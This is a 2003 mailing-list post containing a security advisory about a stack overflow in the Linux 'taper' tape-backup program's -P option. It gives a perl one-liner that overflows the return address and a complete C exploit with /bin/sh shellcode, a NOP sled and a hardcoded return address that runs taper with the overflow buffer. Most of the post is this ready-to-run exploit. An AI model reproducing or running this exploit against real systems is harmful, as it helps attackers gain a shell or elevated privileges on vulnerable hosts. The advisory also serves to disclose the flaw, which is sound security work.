HI,
        There is a stack overflow vulnerability in taper program of linux 
7.3 (may be others)..
On linux 7.3 its not suid by default. But i dont know about other distro/ver 
. may be its
suid on others..

Advisory:

------------------------------------------------------------------------------------------------------------------------------
gEEkz-advisory
NrAziz(c) 2003
nraziz_at_geekz_nl
polygrithm_at_hotmail
http://geekz.nl

--{0x01 Introduction:

Taper is a user friendly archive  program  especially  designed
for backing up to tape drives. It also supports backing up to files
on a hard disk.

--{0x02 Vulnerability:

taper has a vulnerability in its argument to -P .By giving a large
string it overwrites the eip..
e.g taper `perl -e 'print "A" x 2708'` over writes the eip. It may have 
other possible vulnerabilites because
of the usage of many strcpy's. Taper by default is none-suid on Linux 
7.3,However if its suid
on any other distro/ver please let me know then..

--{0x03 Greetz:

To gEEkz team,rave,gorny,and other m8s

------------------------------------------------------------------------------------------------------------------------------

Exploit:

------------------------------------------------------------------------------------------------------------------------------
      /* gEEkz-taper-xploit */
/*
* Copyright(C) 2003 NrAziz
* nraziz^at^geekz^nl
*/
#include <stdio.h>
#include <stdlib.h>

/* /bin/sh */
char shellcode[]=
                 "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
                 "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
                 "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
                 "\x80\xb0\x01\x31\xdb\xcd\x80";
#define B_SIZE 2708
int main(int argc,char **argv)
{
  char buffer[B_SIZE];
  int i;
  u_long ret=0xbffff250;

  memset(buffer,0x90,B_SIZE-strlen(shellcode)-4);
  buffer[B_SIZE-4]=(ret & 0x000000ff);
  buffer[B_SIZE-3]=(ret & 0x0000ff00)>>8;
  buffer[B_SIZE-2]=(ret & 0x00ff0000)>>16;
  buffer[B_SIZE-1]=(ret & 0xff000000)>>24;
  buffer[B_SIZE-0]=0;
  memcpy(buffer+B_SIZE-strlen(shellcode)-4,shellcode,strlen(shellcode));

  execl("/usr/sbin/taper","taper","-P",buffer,(char *)0);
  return 0;
}



---------------------------------------------------------------------------------------------------------------------------------------

REgards,
NrAziz

_________________________________________________________________
Add photos to your e-mail with MSN 8. Get 2 months FREE*. 
http://join.msn.com/?page=features/featuredemail